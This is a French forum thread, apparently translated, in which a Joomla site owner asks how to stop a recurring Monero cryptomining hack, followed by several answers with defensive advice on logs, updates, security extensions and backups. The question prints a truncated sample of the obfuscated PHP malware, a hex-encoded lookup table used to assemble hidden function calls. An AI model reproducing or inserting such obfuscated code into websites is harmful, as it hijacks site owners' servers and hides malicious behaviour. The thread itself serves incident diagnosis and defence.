Comment sécuriser Joomla contre le piratage Monero Crypto-currency
mes sites ont été piratés et ce que je pouvais trouver en ligne était un piratage Monero Crypto-mining.
J'ai utilisé les mesures de sécurité habituelles sur mon site - celle que je fais habituellement sur les pages Joomla, mais qui ne fonctionne pas. Le code malveillant revient
Avez-vous une expérience et des suggestions que pourrais-je également faire pour sécuriser le site Web de Joomla?
Savez-vous quelle "porte arrière" dans l'extension ou Joomla lui-même utilise-t-il pour réécrire ou ajouter du code?
Exemple de code:
$d8f437 = 62;$GLOBALS['a8f0ec1e5']=Array();global$a8f0ec1e5;$a8f0ec1e5=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['dba283']="\x73\x77\x5b\x55\x50\x27\x2b\x3b\x6d\x6c\x22\x2c\x44\x47\x23\x3e\x3f\x68\x35\x76\x30\x3a\x5a\x20\x2f\x28\x7e\x53\x43\x79\x58\x5d\x2e\x72\x64\x3d\x75\x6a\x62\x4c\x7b\x56\x69\x7c\x31\x52\x4e\x2d\x26\x25\x51\x46\x4d\x6e\x78\x67\x74\x48\x66\x38\x4f\x65\x29\x71\x33\x3c\x34\x59\x39\x21\x57\x24\x42\x60\x70\x5c\x7d\xa\x6f\x5e\x5f\x32\x7a\x36\xd\x54\x61\x41\x9\x40\x63\x4b\x37\x2a\x49\x6b\x45\x4a";$a8f0ec1e5[$a8f0ec1e5['dba283'][56].$a8f0ec1e5['dba283'][34].$a8f0ec1e5['dba283'][61].$a8f0ec1e5['dba283'][66].$a8f0ec1e5['dba283'][61].$a8f0ec1e5['dba283'][90]]=$a8f0ec1e5['dba283'][90].$a8f0ec1e5['dba283'][17].$a8f0ec1e5['dba283'][33];$a8f0ec1e5[$a8f0ec1e5['dba283'][63].$a8f0ec1e5['dba283'][68].$a8f0ec1e5['dba283'][38].$a8f0ec1e5['dba283'][92].$a8f0ec1e5['dba283'][68].$a8f0ec1e5['dba283'][68].$a8f0ec1e5['dba283'][68].$a8f0ec1e5['dba283'][86].$a8f0ec1e5['dba283'][58]]=$a8f0ec1e5['dba283'][78].$a8f0ec1e5['dba283'][33].$a8f0ec1e5['dba283'][34];$a8f0ec1e5[$a8f0ec1e5['dba283'][63].$a8f0ec1e5['dba283'][86].$a8f0ec1e5['dba283'][61].$a8f0ec1e5['dba283'
Trouver la "porte dérobée" peut être difficile. Vous pouvez vérifier les journaux d'accès pour des demandes étranges. Peut-être que votre fournisseur d'hébergement offre d'autres journaux comme les journaux de connexion FTP.
Je recommande d'installer Akeeba Admin Tools pour prévenir les attaques de base.
https://www.akeebabackup.com/products/admin-tools.html
Voici une bonne source d’idées pour sécuriser un site: https://www.bluebridgedev.com/blog/entry/how-to-secure-a-joomla-site
En général, ce blog mérite une lecture: https://www.bluebridgedev.com/blog
Pour d'éventuels nouveaux problèmes de sécurité, je vous recommande de vous abonner au flux RSS de:
https://developer.joomla.org/security-centre
Trouver la porte dérobée est certes difficile, mais pas impossible. Vous devrez vérifier tous vos journaux, faire correspondre les dates pour chaque entrée suspecte, jusqu'à ce que vous trouviez la cause première du problème.
Cela dit, vous devez toujours exécuter la dernière version de Joomla, désactiver les extensions inutilisées, mettre à jour vos extensions utilisées avec la dernière version et protéger votre backend avec un .htpasswd.
Ayant fait une petite recherche sur votre code malveillant, je suis tombé sur cet article qui explique en quoi consiste l'extrait de code et son effet.
https://adamfeuer.com/notes/2017/10/16/removing-and-blocking-monero-mining-wordpress-malware/
Il est donc possible que le serveur utilise une tonne de ressources, telles que le processeur et les requêtes. Ce n'est peut-être pas Joomla ou une extension à l'origine du problème, mais un serveur mal configuré. Si vous êtes sur l'hébergement partagé, vous avez peut-être été affecté par le site de quelqu'un d'autre. Tu ne sais jamais.
Consultez les journaux de votre serveur, contactez votre hébergeur, assurez-vous que vous utilisez la dernière version de Joomla (actuellement 3.8.5) et toute votre extension.
Ma recommandation personnelle pour surveiller, analyser et sécuriser votre site serait https://myjoomla.com
Vous pouvez vérifier le VEL pour savoir si l’une des extensions installées présente des vulnérabilités connues.
Les vulnérabilités connues sont généralement corrigées dès que possible.
Comme pour tout site Web piraté, vous avez probablement trois options:
restaurer à partir d'une bonne sauvegarde connue, mettre à jour les extensions Joomla et tierces avec les dernières versions et réinitialiser les mots de passe
reconstruire le site à partir de zéro avec des copies propres de Joomla et des extensions tierces
trouvez et corrigez le malware, mettez à jour les extensions de Joomla et de tiers avec les dernières versions et réinitialisez les mots de passe
L’option 3 est généralement mon option préférée et j’ai tendance à faire confiance à mysites.guru (anciennement myjoomla.com) pour aider à trouver le logiciel malveillant et à supprimer/écraser des fichiers si nécessaire.
Pensez également à vérifier la protection antivirus de votre ordinateur ou de tout autre appareil susceptible de stocker les mots de passe de Joomla ou de l'hébergement du panneau de configuration pour votre site Web.
Voir http://joomla.stackexchange.com/a/180/12 pour plus d'informations sur la sécurisation d'un site Web Joomla.